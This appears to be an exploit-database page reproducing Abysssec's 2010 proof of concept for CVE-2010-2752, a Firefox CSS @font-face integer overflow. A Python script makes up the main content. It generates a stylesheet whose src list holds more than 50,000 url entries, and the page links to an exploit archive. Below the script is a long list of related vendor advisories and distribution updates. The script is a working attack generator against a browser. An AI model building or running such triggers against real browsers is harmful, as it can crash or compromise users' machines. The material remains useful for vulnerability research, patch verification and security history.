Lucene search
AbysssecPACKETSTORM:94241HistorySep 25, 2010 - 12:00 a.m.
Month Of Abysssec Undisclosed Bugs - Mozilla Firefox CSS Font-Face
2010-09-2500:00:00
Abysssec
packetstormsecurity.com
33
0.798 High
EPSS
Percentile
98.0%
`'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/
http://www.exploit-db.com/sploits/moaub-25-exploit.zip
'''
'''
Title : Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
Version : Firefox
Analysis : http://www.abysssec.com
Vendor : http://www.mozilla.com
Impact : Crirical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-2752
'''
import sys;
myStyle = """
@font-face {
font-family: Sean;
font-style: normal;
font-weight: normal;
src: url(SEAN1.eot);
src: url('type/filename.woff') format('woff')
"""
i=0
while(i<50000):
myStyle = myStyle + ",url('type/filename.otf') format('opentype')\n";
i=i+1
myStyle = myStyle + ",url('type/filename.otf') format('opentype');\n";
myStyle = myStyle + "}\n";
cssFile = open("style2.css","w")
cssFile.write(myStyle)
cssFile.close()
`
Related
seebug
seebug
Mozilla Firefox CSS - font-face Remote Code Execution Vulnerability
2014-07-01 00:00:00
securityvulns
securityvulns
Mozilla Foundation Security Advisory 2010-39
2010-07-24 00:00:00
Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities
2010-07-24 00:00:00
zdi
zdi
Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
2010-07-20 00:00:00
veracode
veracode
Arbitrary Code Execution
2020-04-10 00:46:15
mozilla
mozilla
nsCSSValue::Array index integer overflow — Mozilla
2010-07-20 00:00:00
checkpoint_advisories
checkpoint_advisories
Mozilla Products nsCSSValue Array Index Integer Overflow (CVE-2010-2752)
2010-10-03 00:00:00
ubuntucve
ubuntucve
CVE-2010-2752
2010-07-23 00:00:00
cvelist
cvelist
CVE-2010-2752
2010-07-30 20:00:00
exploitpack
exploitpack
Mozilla Firefox CSS - font-face Remote Code Execution
2010-09-25 00:00:00
prion
prion
Integer overflow
2010-07-30 20:30:00
cve
cve
CVE-2010-2752
2010-07-30 20:30:00
exploitdb
exploitdb
Mozilla Firefox CSS - font-face Remote Code Execution
2010-09-25 00:00:00
openvas
openvas
Oracle: Security Advisory (ELSA-2010-0892)
2015-10-06 00:00:00
Mandriva Update for mozilla-thunderbird MDVSA-2010:169 (mozilla-thunderbird)
2010-09-07 00:00:00
Mandriva Update for mozilla-thunderbird MDVSA-2010:169 (mozilla-thunderbird)
2010-09-07 00:00:00
oraclelinux
oraclelinux
openswan security update
2011-02-10 00:00:00
firefox security update
2010-07-21 00:00:00
nessus
nessus
Mandriva Linux Security Advisory : mozilla-thunderbird (MDVSA-2010:169)
2010-09-03 00:00:00
openSUSE Security Update : MozillaThunderbird (openSUSE-SU-2010:0430-2)
2010-07-28 00:00:00
openSUSE Security Update : MozillaThunderbird (openSUSE-SU-2010:0430-2)
2014-06-13 00:00:00
ubuntu
ubuntu
Thunderbird vulnerabilities
2010-07-26 00:00:00
Firefox and Xulrunner vulnerabilities
2010-07-23 00:00:00
Firefox and Xulrunner vulnerability
2010-07-26 00:00:00
debian
debian
[Backports-security-announce] Security Update for xulrunner
2010-07-21 09:30:16
[Backports-security-announce] Security Update for xulrunner
2010-07-21 09:30:33
fedora
fedora
[SECURITY] Fedora 13 Update: sunbird-1.0-0.26.b2pre.fc13
2010-07-23 02:48:57
[SECURITY] Fedora 13 Update: thunderbird-3.1.1-1.fc13
2010-07-23 02:48:57
[SECURITY] Fedora 12 Update: firefox-3.5.11-1.fc12
2010-07-23 02:47:25
centos
centos
firefox, xulrunner security update
2010-07-22 15:29:05
redhat
redhat
(RHSA-2010:0547) Critical: firefox security update
2010-07-20 00:00:00
freebsd
freebsd
mozilla -- multiple vulnerabilities
2010-07-20 00:00:00
suse
suse
remote code execution in MozillaFirefox,MozillaThunderbird,seamonkey
2010-07-30 13:10:04
Firefox update to 31.1esr (important)
2014-09-09 18:04:16
gentoo
gentoo
Mozilla Products: Multiple vulnerabilities
2013-01-08 00:00:00